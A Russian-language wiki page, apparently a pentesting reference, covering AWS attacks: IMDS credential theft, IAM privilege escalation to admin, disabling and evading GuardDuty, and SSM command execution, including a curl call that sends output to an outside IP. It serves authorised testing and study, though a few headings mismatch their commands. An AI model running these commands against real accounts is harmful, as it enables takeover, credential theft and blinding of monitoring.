[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-09-30T16:19:18Z

Drakylar: /* Лаборатории */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

